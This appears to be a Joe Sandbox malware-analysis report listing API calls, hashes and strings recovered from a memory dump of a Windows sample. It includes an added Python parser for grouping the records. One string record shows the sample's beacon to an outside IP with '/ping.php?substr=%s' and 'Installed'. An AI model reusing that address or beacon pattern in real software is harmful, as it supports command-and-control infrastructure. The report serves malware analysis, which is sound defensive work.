                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                  • Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%
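The records above are Joe Sandbox's per-function output for the image dumped at 00400000 in the memory dump 00000004.00000002.2243537474...: for each function, the APIs it calls (with call-site addresses, and calls made by a callee marked "Part of subcall function"), the dump it came from, and the similarity identifiers. Three of them (first call sites 0040418E, 004033EF and 004035FA) share API String ID 1202896665-0 and the same API mix while their Opcode IDs differ, which is what one routine compiled several times looks like. The parser below is an added example, not Joe Sandbox tooling and not code from this report: it reads records in the format shown here and groups them by API String ID so that such repetition is listed automatically. Its reading of the .sdmp file name (fourth field as the dump base, fifth as the page protection, 0x40 being PAGE_EXECUTE_READWRITE) is an assumption about the naming scheme, not something the page states. The sample text is an abridged copy of three records from this section with the extraction indentation removed.

```python
"""Parse Joe Sandbox per-function records as rendered on this page and group them
by API String ID to surface repeated code. Added example, not Joe Sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three records from this report, abridged, indentation removed.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 0040418E
• int.LIBCPMT ref: 004041B4
  • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
• std::locale::_Getfacet.LIBCPMT ref: 004041BD
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID:
• API String ID: 1202896665-0
• Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 004033EF
• std::locale::_Getfacet.LIBCPMT ref: 0040341E
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 1202896665-0
• Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
• SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 3852720340-0
Uniqueness Score: -1.00%
"""

HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
API_RE = re.compile(r"^• (?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<name>.+?)\."
                    r"(?P<lib>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<addr>[0-9A-F]{8})$")
KV_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    lib: str
    addr: int                          # call-site address inside the dump
    args: Optional[str] = None         # argument snapshot, when the report shows one
    via_subcall: Optional[int] = None  # callee that actually makes the call


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # Similarity / dump-source key-values
    uniqueness: Optional[float] = None

    def first_ref(self) -> Optional[int]:
        """First direct call site; used here as the function's label."""
        return next((a.addr for a in self.apis if a.via_subcall is None), None)

    def dump_base_and_protection(self) -> tuple:
        """Assumption, not stated on the page: in <idx>.<run>.<id>.<base>.<prot>...sdmp
        field 3 is the dump base and field 4 the page protection (0x40 = RWX)."""
        parts = self.fields["Source File"].split(",")[0].split(".")
        return int(parts[3], 16), int(parts[4], 16)


def parse_records(text: str) -> list:
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().removesuffix("Download File")  # link label fused onto .sdmp names
        if line == "APIs":                                # every record opens with this header
            records.append(cur := FunctionRecord())
        if not line or line in HEADERS or cur is None:
            section = line if line in HEADERS else section
            continue
        if line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["lib"], int(m["addr"], 16), m["args"],
                                    int(m["sub"], 16) if m["sub"] else None))
        elif m := KV_RE.match(line):
            cur.fields[m["key"]] = m["val"].strip()
    return records


def repeated_code(records) -> dict:
    """API String IDs shared by several functions: identical API mix and strings
    but distinct Opcode IDs, i.e. one routine compiled more than once."""
    groups = defaultdict(list)
    for r in records:
        sid, ref = r.fields.get("API String ID"), r.first_ref()
        if sid and ref is not None:
            groups[sid].append(f"{ref:08X}")
    return {k: v for k, v in groups.items() if len(v) > 1}


def calls_to_lib(records, lib: str) -> list:
    """Distinct API names the dump resolves against one module, e.g. KERNEL32."""
    return sorted({a.name for r in records for a in r.apis if a.lib == lib})
```

Running `parse_records` over the full function listing of a report (pasted as text, indentation and the fused "Download File" labels are tolerated) and then `repeated_code` gives the list of API String IDs that recur; `calls_to_lib(records, "KERNEL32")` is the quick way to see which Win32 imports the unpacked image actually reaches, which is more reliable than the packed file's import table for a sample that, as the signatures above note, rewrites its own PE header.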

                                                                                                                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
• Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
• Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
• GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: -@
• API String ID: 3177248105-2564449678
• Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
• Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
• Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
• std::system_error::system_error.LIBCPMT ref: 004018D8
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: Exception@8Throwstd::system_error::system_error
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 1589814233-1866435925
• Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
• Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
• Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
• FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
• Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
• Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
• Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
• Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
• _free.LIBCMT ref: 004146D7
• _free.LIBCMT ref: 004146EE
• _free.LIBCMT ref: 0041470D
• _free.LIBCMT ref: 00414728
• _free.LIBCMT ref: 0041473F
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free$AllocateHeap
• String ID:
• API String ID: 3033488037-0
• Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
• Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
• Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
• __alloca_probe_16.LIBCMT ref: 0041B4AE
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
• __freea.LIBCMT ref: 0041B51A
  • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
  • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
• _free.LIBCMT ref: 0041E598
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
• _free.LIBCMT ref: 00416DD7
• _free.LIBCMT ref: 00416DFE
• SetLastError.KERNEL32(00000000), ref: 00416E0B
• SetLastError.KERNEL32(00000000), ref: 00416E14
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0041EEB6
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 0041EEC8
• _free.LIBCMT ref: 0041EEDA
• _free.LIBCMT ref: 0041EEEC
• _free.LIBCMT ref: 0041EEFE
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 004152D0
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 004152E2
• _free.LIBCMT ref: 004152F5
• _free.LIBCMT ref: 00415306
• _free.LIBCMT ref: 00415317
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2895899722
                                                                                                                                                                                                                                  • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                    • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                    • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                    • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-1863747741
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
